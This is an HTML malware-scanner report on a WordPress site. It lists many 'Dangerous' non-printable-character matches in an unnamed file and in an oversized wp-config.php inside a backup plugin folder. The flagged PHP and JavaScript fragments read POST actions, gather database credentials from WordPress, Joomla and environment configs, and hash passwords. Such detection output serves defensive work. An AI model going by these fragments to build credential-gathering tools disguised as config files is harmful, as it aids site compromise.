</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_get_post_action</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 432</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_statuses_migrate_from_legacy_state</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (string) </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'up_to_action'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$imported</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">merge_site_status</span><span style="color: #007700">(&</span><span style="color: #0000BB">$site</span><span style="color: #007700">, </span><span style="color: #0000BB">$statuses</span><span style="color: #007700">, </span><span style="color: #0000BB">$name_counts </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_label</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 461</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset(</span><span style="color: #0000BB">$labels</span><span style="color: #007700">[</span><span style="color: #0000BB">$status</span><span style="color: #007700">]) ? </span><span style="color: #0000BB">$labels</span><span style="color: #007700">[</span><span style="color: #0000BB">$status</span><span style="color: #007700">] : </span><span style="color: #0000BB">$labels</span><span style="color: #007700">[</span><span style="color: #DD0000">'pending'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 463</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_db_info_rows</span><span style="color: #007700">(</span><span style="color: #0000BB">$site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (string) </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'action'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$rows</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 499</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apr1_md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$password</span><span style="color: #007700">, </span><span style="color: #0000BB">$salt </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_safe_header</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'$apr1$' </span><span style="color: #007700">. </span><span style="color: #0000BB">$salt </span><span style="color: #007700">. </span><span style="color: #DD0000">'$' </span><span style="color: #007700">. </span><span style="color: #0000BB">$tmp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 523</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apr1_to64</span><span style="color: #007700">(</span><span style="color: #0000BB">$v</span><span style="color: #007700">, </span><span style="color: #0000BB">$n</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 527</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_flush_json</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$a</span><span style="color: #007700">, </span><span style="color: #0000BB">$b</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'is_dir'</span><span style="color: #007700">] ? -</span><span style="color: #0000BB">1 </span><span style="color: #007700">: </span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return -</span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strcasecmp</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'up_to_wp_register_admin_page'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_get_app_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_nonce_url</span><span style="color: #007700">(</span><span style="color: #0000BB">admin_url</span><span style="color: #007700">(</span><span style="color: #DD0000">'admin-ajax.php?action=up_to_scanner'</span><span style="color: #007700">), </span><span style="color: #DD0000">'up_to_scanner_app'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_register_admin_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 72</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_render_admin_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 82</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_handle_app_request</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 846</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_esc_ident</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 847</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'`' </span><span style="color: #007700">. </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'`'</span><span style="color: #007700">, </span><span style="color: #DD0000">'``'</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">) . </span><span style="color: #DD0000">'`'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 849</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_sanitize_file_part</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 853</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">!== </span><span style="color: #DD0000">'' </span><span style="color: #007700">? </span><span style="color: #0000BB">$value </span><span style="color: #007700">: </span><span style="color: #DD0000">'site'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 855</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_empty</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 865</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_db_host_port</span><span style="color: #007700">(</span><span style="color: #0000BB">$host</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 868</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'127.0.0.1'</span><span style="color: #007700">, </span><span style="color: #0000BB">null</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">], </span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 872</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$host</span><span style="color: #007700">, </span><span style="color: #0000BB">null</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 874</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">merge_db_credentials</span><span style="color: #007700">(</span><span style="color: #0000BB">$base</span><span style="color: #007700">, </span><span style="color: #0000BB">$overlay</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 880</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$base</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 882</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_is_complete</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">[</span><span style="color: #DD0000">'db_name'</span><span style="color: #007700">]) !== </span><span style="color: #DD0000">'' </span><span style="color: #007700">&& </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">[</span><span style="color: #DD0000">'db_user'</span><span style="color: #007700">]) !== </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 885</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_from_wp</span><span style="color: #007700">(</span><span style="color: #0000BB">$wp</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 896</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$c</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_from_env</span><span style="color: #007700">(</span><span style="color: #0000BB">$env</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 924</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_from_joomla</span><span style="color: #007700">(</span><span style="color: #0000BB">$joo</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 936</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_db_credentials_from_parts</span><span style="color: #007700">(</span><span style="color: #0000BB">$env_vars</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_vars</span><span style="color: #007700">, </span><span style="color: #0000BB">$joo_vars</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">db_credentials_is_complete</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$creds </span><span style="color: #007700">: </span><span style="color: #0000BB">null</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_db_config_snippet</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">db_credentials_empty</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 986</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$found</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 988</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dump_input_from_post</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_527").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/backup_1781207797/wp-config.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 155.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-06-11 22:56:39</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-06-11 22:56:39</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 271</span><br><table id="file_528" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">disabled</span><span style="color: #007700">=</span><span style="color: #0000BB">false</span><span style="color: #007700">; </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'💾 Сохранить'</span><span style="color: #007700">; </span><span style="color: #0000BB">msg</span><span style="color: #007700">.</span><span style="color: #0000BB">className</span><span style="color: #007700">=</span><span style="color: #DD0000">'modal-msg error'</span><span style="color: #007700">; </span><span style="color: #0000BB">msg</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'❌ '</span><span style="color: #007700">+</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">message</span><span style="color: #007700">; }); } </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">addEventListener</span><span style="color: 